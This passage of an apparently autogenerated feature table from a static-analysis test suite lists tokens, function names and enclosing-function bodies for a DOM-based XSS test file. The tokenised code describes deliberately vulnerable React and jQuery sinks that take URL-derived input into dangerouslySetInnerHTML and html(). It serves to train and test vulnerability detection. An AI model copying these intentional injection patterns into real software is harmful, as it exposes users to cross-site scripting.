state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:204:24:204:31 | tainted1 | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:204:24:204:31 | tainted1 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:204:35:204:41 | tainted | assignedToPropName | tainted1 | +| autogenerated/Xss/DomBasedXss/tst.js:204:35:204:41 | tainted | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:204:35:204:41 | tainted | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:204:35:204:41 | tainted | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:204:35:204:41 | tainted | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:204:35:204:41 | tainted | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:205:13:205:16 | this | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:205:13:205:16 | this | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:205:13:205:16 | this | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:205:13:205:16 | this | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:205:13:205:16 | this | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:205:13:205:22 | this.state | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:205:13:205:22 | this.state | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:205:13:205:22 | this.state | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:205:13:205:22 | this.state | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:205:13:205:22 | this.state | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:205:13:205:33 | this.st ... Tainted | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:205:13:205:33 | this.st ... Tainted | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:205:13:205:33 | this.st ... Tainted | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:205:13:205:33 | this.st ... Tainted | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:205:13:205:33 | this.st ... Tainted | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:205:13:205:46 | this.st ... ookup() | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:205:13:205:46 | this.st ... ookup() | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:205:13:205:46 | this.st ... ookup() | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:205:13:205:46 | this.st ... ookup() | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:205:13:205:46 | this.st ... ookup() | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:205:18:205:22 | state | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:205:18:205:22 | state | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:205:18:205:22 | state | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:205:18:205:22 | state | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:205:18:205:22 | state | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:205:24:205:33 | notTainted | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:205:24:205:33 | notTainted | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:205:24:205:33 | notTainted | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:205:24:205:33 | notTainted | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:205:24:205:33 | notTainted | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:205:37:205:44 | dbLookup | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:205:37:205:44 | dbLookup | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:205:37:205:44 | dbLookup | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:205:37:205:44 | dbLookup | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:205:37:205:44 | dbLookup | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:205:37:205:46 | dbLookup() | assignedToPropName | notTainted | +| autogenerated/Xss/DomBasedXss/tst.js:205:37:205:46 | dbLookup() | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:205:37:205:46 | dbLookup() | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:205:37:205:46 | dbLookup() | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:205:37:205:46 | dbLookup() | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:205:37:205:46 | dbLookup() | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:205:37:205:46 | exceptional return of dbLookup() | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:205:37:205:46 | exceptional return of dbLookup() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:205:37:205:46 | exceptional return of dbLookup() | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:205:37:205:46 | exceptional return of dbLookup() | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:205:37:205:46 | exceptional return of dbLookup() | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:206:13:206:16 | this | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:206:13:206:16 | this | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:206:13:206:16 | this | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:206:13:206:16 | this | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:206:13:206:16 | this | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:206:13:206:25 | this.setState | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:206:13:206:25 | this.setState | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:206:13:206:25 | this.setState | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:206:13:206:25 | this.setState | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:206:13:206:25 | this.setState | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:206:13:206:56 | exceptional return of this.se ... ted })) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:206:13:206:56 | exceptional return of this.se ... ted })) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:206:13:206:56 | exceptional return of this.se ... ted })) | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:206:13:206:56 | exceptional return of this.se ... ted })) | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:206:13:206:56 | exceptional return of this.se ... ted })) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:206:13:206:56 | this.se ... ted })) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:206:13:206:56 | this.se ... ted })) | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:206:13:206:56 | this.se ... ted })) | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:206:13:206:56 | this.se ... ted })) | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:206:13:206:56 | this.se ... ted })) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:206:18:206:25 | setState | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:206:18:206:25 | setState | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:206:18:206:25 | setState | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted 